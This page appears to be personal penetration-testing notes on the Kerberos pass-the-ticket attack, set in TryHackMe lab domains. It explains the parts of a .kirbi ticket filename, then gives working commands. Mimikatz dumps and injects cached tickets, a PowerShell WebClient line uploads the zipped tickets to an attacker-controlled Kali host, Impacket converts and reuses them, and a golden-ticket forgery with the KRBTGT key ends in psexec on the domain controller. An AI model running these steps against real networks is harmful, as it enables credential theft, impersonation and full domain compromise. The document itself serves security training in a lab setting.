Skip to main content

Pass the Ticket

Anatomy of a Kerberos Ticket

[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-ZA.TRYHACKME.COM.kirbi
|_______| ^ |________| |_____________| |_____________________||_____|
    |     |     |              |                   |             |______file extension
    |     |     |              |                   |
    |     |     |              |                   |______resource
    |     |     |              |
    |     |     |              |______user/computer account (ticket owner)
    |     |     |
    |     |     |______0x40e10000 kerberos flag [1]
    |     |
    |     |______kerberos ticket type
    |            0 = TGS / 1 = Client ticket / 2 = TGT
    |
    |__________0x97d82 user LUID [2]

[1] Example output from running "klist" on a Windows host

0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize


[2] Each logon session has a locally-unique identifier (LUID). A LUID is a system-generated 64-bit value guaranteed to be unique during a single boot session on the system on which it was generated. Some LUIDs are predefined. For example, the LUID for the System account’s logon session is always 0x3e7 (999 decimal), the LUID for Network Service’s session is 0x3e4 (996), and Local Service’s is 0x3e5 (997). Most other LUIDs are randomly generated.

Pass the Ticket

In general, a Ticket-Granting-Ticket (TGT) ticket is going to grant us more mileage than a Ticket-Granting-Service (TGS) ticket. A TGT will allow us to request new TGS tickets to any service as a specific user. Whereas, a TGS will only allow us to re-authorize us to a single service the user has previously requested.

Windows

Assuming you have a shell on a Windows target and manage to dump tickets cached on the box, you'll generally want to use tools such as mimikatzrubeuskekeo, etc to inject and pass tickets around the network.

Mimikatz

mimikatz # sekurlsa::tickets /export

Dump Cached Tickets

[0;ca99f8]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi

Valid TGT

kerberos::ptt [0;ca99f8]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi

Mimikatz PTT

Linux

Tickets Dumped from Windows Target

https://notes.benheater.com/books/file-transfers-and-data-exfiltration/page/file-transfer-techniques

# Add all the tickets a .zip archive
Compress-Archive -Path .\*.kirbi -DestinationPath tickets.zip

# Send the .zip archive to Kali
# UploadFile method reqires two arguments
	# URI
    # Absolute path to file
$webClient = New-Object System.Net.WebClient
$webClient.UploadFile('http://kali-vpn-ip/upload.php', "$PWD\tickets.zip")

Demonstrates dumping cached .kirbi tickets on the target, compressing them to .zip, and uploading them to Kali for further processing

# Convert the TGT to Linux format
impacket-ticketConverter '[0;ca99f8]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi' 't1_toby.beck.ccache'

Tickets have been transferred to Kali. Use impacket-ticketConverter to convert .kirbi to .ccache

KRB5CCNAME='t1_toby.beck.ccache' impackt-GetNPUsers -k -no-pass -usersfile users.txt \
-dc-ip 10.80.80.2 'ZA.TRYHACKME.COM/t1_toby.beck'@thmiis.za.tryhackme.com

Example using the .ccache ticket to authenticate as t1_toby.beck

More Examples of Kerberos Authentication from Kali

https://notes.benheater.com/books/active-directory/page/kerberos-authentication-from-kali

Targeted Attacks

Impacket Golden Ticket
enum4linux -l dc.ad.lab

Use enum4linux to dump the domain SID

impacket-ticketer -aesKey 'KRBTGT_KERBEROS_AESKEY' \
-domain-sid 'S-1-5-21-DOMAIN-SID-HERE' \
-domain 'ad.lab' -dc-ip '10.80.80.2' -user-id '500' 'Administrator'

Use impacket-ticketer along with the KRBTGT AES key to generate a Kerberos TGT for Administrator

KRB5CCNAME=Administrator.ccache impacket-psexec -dc-ip 10.80.80.2 'ad.lab/Administrator'@dc.ad.lab

Pass Administrator's TGT to the domain controller

Back to top